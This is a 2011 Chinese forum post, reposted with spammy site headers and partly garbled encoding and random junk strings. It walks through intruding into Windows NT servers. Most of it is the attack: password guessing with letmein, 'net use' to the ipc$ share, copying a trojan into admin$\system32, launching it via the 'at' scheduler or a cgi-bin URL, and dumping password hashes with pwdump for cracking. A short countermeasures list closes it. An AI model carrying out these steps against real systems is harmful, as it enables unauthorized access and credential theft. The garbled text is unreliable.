天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁]
      

      
作者: 雜七雜八    時(shí)間: 2011-1-12 16:31
      
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
      看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺真是。??磥韓t系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 $ M& y7 w& d+ w3 T) m; F' }
      
    其攻擊過程如下: , p/ D3 r1 I, N
      
1、使用掃描工具查找NT主機(jī)       . d7 w& g& U1 {+ j4 @
      
2 、確定攻擊目標(biāo)后,使用letmein 對(duì)目標(biāo)主機(jī)進(jìn)行攻擊, 如: ( L% l% Q$ [; l, o( z
      
letmein file://x.x.x.x/ -all -g mypwd (對(duì)\\x.x.x.x上所有用戶攻擊) " Y$ U3 K! T& z& M6 s& u! I4 [
      
letmein file://x.x.x.x/ -admin -g mypwd (對(duì)\\x.x.x.x上管理員攻擊) 
      
7 x$ Y# A: ?6 X# i: q- Yletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶) 0 U; r3 n/ @8 [2 Q1 l' D
      
注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 
      
% a  p: f1 z1 h7 y* G9 y/ t3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: 
      
+ p9 X9 J4 _2 [9 s# }4 tnet use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 
      
# O/ R6 _- w* V5 q. n  T8 x" {6 Dcopy x:\netserver.exe \\x.x.x.x\admin$\system32   n  S0 _" ]6 }1 a$ x' Z
      
4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù): 2 z+ k  g9 G! a0 |! D6 m( e
      
netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 
      
+ f7 p4 @# g! k; S+ y4 p2 G' p# _+ G* C* U2 r2 f; d
      
   該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) + G: W0 {$ [/ l4 u
      

      
% t! ]4 ?1 |. E$ u, N   另一種方法: 
      
! [3 x! q& P6 v/ J+ Y. P   將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng)
      
' \4 I9 ?0 t; b5 ?* o: B$ i8 K% M9 U2 n7 R+ f4 k, E9 q
      
    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 + y; N6 G/ e" V; K; A' Q/ l6 w- @; }
      
    如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運(yùn)算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對(duì)letmein只是多花幾分鐘而已。我對(duì)某些大的公共平臺(tái)服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺(tái)有配備火墻,但是沒有封閉對(duì)外137-139口。 ! Y. T; z3 t  h; R! c
      

      
8 A/ v) P+ Q; r  u( z4 O) H     對(duì)策: 
      
5 X% a2 W* S- i! B* m$ i1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。 
      
0 K" }3 O- M# w+ V1 ~7 P2 g' S5 V2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對(duì)外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。 % J: r+ O- H' F) B  D  v
      
3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來代替。 / q8 }6 g" _& [5 R6 r
      
4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對(duì)文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 
      
! i6 R: a, {$ P* b7 M5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無疑對(duì)你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時(shí)不刻在影響著你 。
      
% x  |8 r1 V  B! T1 }+ m




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5